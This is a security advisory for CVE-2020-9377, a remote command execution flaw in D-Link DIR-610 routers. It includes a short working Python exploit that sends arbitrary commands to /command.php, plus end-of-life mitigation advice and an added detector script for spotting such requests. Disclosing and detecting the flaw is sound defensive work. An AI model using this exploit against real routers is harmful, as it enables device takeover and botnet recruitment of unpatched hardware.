Heitor Gouvêa
CVE-2020-9377 - Remote Code Execution (RCE) on D-LINK 610 Router
Summary
The DIR-610 is a router that was developed and sold by D-Link and was distributed in Central America and South America.
Description
Exploit
#!/usr/bin/python
import os
import sys
import urllib2
import threading
import time

def main(host, port, uid, command):
    request = urllib2.Request('http://%s:%s/command.php' % (host, port), 'cmd=%s' % command, { 'Cookie': 'uid=%s' % uid })
    print urllib2.urlopen(request).read()

if __name__ == '__main__':
    [host, port, uid, command] = sys.argv[1:5]
    main(host, port, uid, command)
Impact
A malicious agent can remotely execute commands on the router's system, take control of it, and subvert the router to perform whatever actions the agent wants, such as using it in botnets, for traffic infection, and for other purposes.
Mitigation
While D-Link is aware of vulnerabilities involving DIR-610, these products have reached End of Life (EoL)/End of Support (EoS) and there is no extended support or development for them. D-Link will not be able to resolve device or firmware issues as all development and customer support has ceased.
The DIR-610 Rev. Ax reached its End of Support Date in 2014; it is no longer supported and firmware development has stopped. All consumers still using the product should retire it and immediately replace the device.
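While a device is still awaiting replacement, traffic toward it can be checked for the request shape the exploit above sends: a POST to /command.php carrying a cmd field. The following Python 3 detector is an added example, not code from the original advisory or from D-Link; the function names and sample requests are constructed for illustration, and it assumes you can obtain raw HTTP requests from a capture or proxy.

```python
# Added example, not code from the original advisory.
import posixpath
import re
from urllib.parse import parse_qs, unquote

TARGET_PATH = "/command.php"   # endpoint used by the exploit on this page
TARGET_FIELD = "cmd"           # body field used by the exploit on this page

def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)  # ValueError if malformed
    # Normalise the path so /./command.php or /%63ommand.php cannot slip past.
    path = unquote(target.split("?", 1)[0])
    path = posixpath.normpath(re.sub(r"/+", "/", path)).lower()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), path, headers, body.decode("latin-1")

def match_command_php(raw):
    """Return a finding dict for a POST of `cmd` to /command.php, else None."""
    try:
        method, path, headers, body = parse_http_request(raw)
    except ValueError:
        return None  # not a parseable request line
    if method != "POST" or path != TARGET_PATH:
        return None
    fields = parse_qs(body, keep_blank_values=True)
    if TARGET_FIELD not in fields:
        return None
    return {
        "path": path,
        "cmd": fields[TARGET_FIELD][0],
        "has_uid_cookie": "uid=" in headers.get("cookie", ""),
    }

# Constructed sample requests (placeholder values, not captured traffic).
SAMPLE_HIT = (b"POST /command.php HTTP/1.1\r\nHost: 192.0.2.1\r\n"
              b"Cookie: uid=PLACEHOLDER\r\nContent-Length: 17\r\n\r\ncmd=example-value")
SAMPLE_ENCODED = SAMPLE_HIT.replace(b"/command.php", b"/./%63ommand.php")
SAMPLE_BENIGN = b"GET /index.php HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n"

if __name__ == "__main__":
    for name, req in [("hit", SAMPLE_HIT), ("encoded", SAMPLE_ENCODED), ("benign", SAMPLE_BENIGN)]:
        print(name, match_command_php(req))
```

The path comparison is lowercased and normalised on purpose, so the check errs toward flagging variants of the same endpoint.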
Conclusion
References
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9377
- https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
- https://www.dlink.com.br/produto/dir-610/
- https://owasp.org/www-community/attacks/Command_Injection
- https://portswigger.net/web-security/os-command-injection